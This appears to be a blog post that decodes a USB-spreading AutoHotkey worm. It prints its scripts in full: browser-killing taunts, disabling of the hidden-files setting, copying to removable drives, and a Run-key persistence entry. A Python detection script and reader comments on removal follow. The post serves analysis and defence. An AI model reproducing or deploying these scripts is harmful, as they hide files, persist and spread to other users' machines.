Virus Decoded

Hi,

A few days back I got a message pop up every time I opened my Mozilla Firefox web browser.

I decoded the virus by opening Task Manager every time the application opened, right-clicking the application and selecting ‘Go To Process’. By ending the process it pointed to, I could stop the virus and browse the internet easily. This time I clicked on ‘Debug Process’ for the process the virus pointed to. On debugging it I couldn’t get the code, but I got the path to the file, which was ‘C:\heap41a\scvhost.exe’. Going to C:\ I couldn’t see any folder named heap41a, but when I typed the location into Explorer a list of files suddenly opened.

script1.txt

#persistent
#notrayicon
; Every 2 seconds run the "ban" routine against the title of the active window.
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
; If the title mentions a blocked site, close the window, play 2.mp3 and show the taunt for 30 seconds.
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r        OR ELSE…,30
return
}
; In Internet Explorer the window title may not name the site, so the text of the Edit controls (address bar) is read instead.
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}

}
return

std.txt

#notrayicon
; Read Explorer's "Show hidden files and folders" setting (CheckedValue under SHOWALL).
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
; If the user has turned it on, force it back to 0 so the hidden C:\heap41a folder stays invisible in Explorer.
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
; The svchost.exe in C:\heap41a is the script interpreter, not the Windows service host: it is launched with each .txt script as its argument.
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

reproduce.txt

#notrayicon
#persistent
; Load the drive letters to check from driveList.txt into Array1..ArrayN.
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
; Run the "reproduce" routine every 5 seconds.
settimer,reproduce,5000
return

reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
; Only removable drives that are ready get a copy of the "offspring" folder at their root.
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1
}
}
}
; Persistence: re-create the Explorer policy Run entry "winlogon" whenever it has been removed or changed.
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
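
Because the three scripts are plain AutoHotkey text, the behaviours worth flagging (turning off the hidden-files setting, the Policies\Explorer\Run autostart entry, copying a folder to removable drive roots, and a svchost.exe run from outside System32) can be found by static pattern matching. The Python triage script below is an added example, not code from this post or from the malware; the sample it scans is constructed from the std.txt and reproduce.txt lines quoted above.

```python
import re

# Each rule: (finding, compiled regex). Patterns follow the AHK command forms used by the scripts on this page.
RULES = [
    ("disables 'show hidden files' (SHOWALL CheckedValue set to 0)",
     re.compile(r"^regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,.*\\Hidden\\SHOWALL,checkedvalue,0\s*$", re.I)),
    ("installs an autostart entry under Policies\\Explorer\\Run",
     re.compile(r"^regwrite,REG_SZ,HKEY_LOCAL_MACHINE,.*\\policies\\Explorer\\Run,", re.I)),
    ("copies a directory to a drive root (removable-media spreading)",
     re.compile(r"^filecopydir,.*,(?:%\w+%|[A-Z]):\\,1\s*$", re.I)),
    ("launches svchost.exe from outside %SystemRoot%\\System32",
     re.compile(r"^run\s+(?!C:\\Windows\\System32\\)\S*svchost\.exe", re.I)),
]

# Constructed sample: the relevant lines of std.txt and reproduce.txt as quoted in the post.
SAMPLE_SCRIPT = r"""#notrayicon
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
FileCopydir,C:\heap41a\offspring,%element%:\,1
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
"""


def triage(script_text):
    """Return [(line_number, finding, line)] for every non-comment line that matches a rule."""
    findings = []
    for lineno, raw in enumerate(script_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith(";"):  # skip blanks and AHK comments
            continue
        for finding, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, finding, line))
    return findings


if __name__ == "__main__":
    for lineno, finding, line in triage(SAMPLE_SCRIPT):
        print(f"line {lineno}: {finding}\n    {line}")
```

The same function can be pointed at any .txt dropped beside a renamed interpreter; a script whose only `Run` target is the real `C:\Windows\System32\svchost.exe` produces no findings.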

9 thoughts on “Virus Decoded”

  1. hii..
    even my system is infected with the following virus can you suggest me any methods to get rid of it..
    thank you
    -rev

  2. hii..
    even my system is infected with the following virus can you suggest me any methods to get rid of it..
    thank you!!

  3. Hey buddy, this is much easier than what I posted in my blog earlier on the same concept, but my suggestions are technical and difficult. I hope your tip to remove the Orkut virus will be the simplest one I have ever seen.

  4. I removed this a while ago; this is what I did.
    1) Ctrl + Alt + Del
    2) Go To Process – stop svchost [THE ONE WHICH HAS A USER = YOUR USER NAME, NOT SYSTEM]
    3) Start, Run “C:\heap41a”. [Delete SVCHOST.exe; if you can't, repeat step 2], the others you will delete later

    4) Open the reproduce.txt file and go to the appropriate registry key [if you're not sure how to do this, I'll explain more later] and delete the key that was added.
    [THIS IS HOW THE VIRUS REPRODUCES: IT LOCKS THE ABILITY TO VIEW HIDDEN FILES SO YOU WILL NEVER SEE THE HIDDEN FILES, WHICH ARE PRESENT IN YOUR OTHER DRIVES E:, F: AND PEN DRIVES]
    … The registry key added is what is blocking this change

    5) Now if you can't do that, an alternative is to use DOS: dir /a shows hidden files. See if you find anything strange in your other drives and delete them with care.
    [Not sure, but there should be a folder with your user name and this should have the virus in it]

    6) If you can view hidden files, search your drives in the main area, i.e. E:, D: etc. There should be an odd folder [maybe your username]; check the folder and delete files if suspicious.

    7) Check all pen drives.
    8) The virus is svchost.exe – just use Task Manager to stop it. [THE one with the second column, not system]

  5. This is actually some great coding; I'm going to use the code to control my computer. Instead of the junk happening when orkut is typed, I'm going to send messages to my computer via MSN, and according to the text sent I will perform actions on my computer. Server admins, you can use this; it can be very useful.

  6. That thing came from my memory stick, which was infected in a picture shop. It all started with a folder in C:\Documents and Settings\Username\LocalSettings\MicrosoftPowerPoint\2.mp3

    I just cleaned the registry and deleted this folder and the heap41a\ one also.

    I cleaned my memory stick of this file:

    J:\autorun.inf is the TR/StarterAEO

    and also these two suspicious ones:

    4A83D000
    20070523.RUN
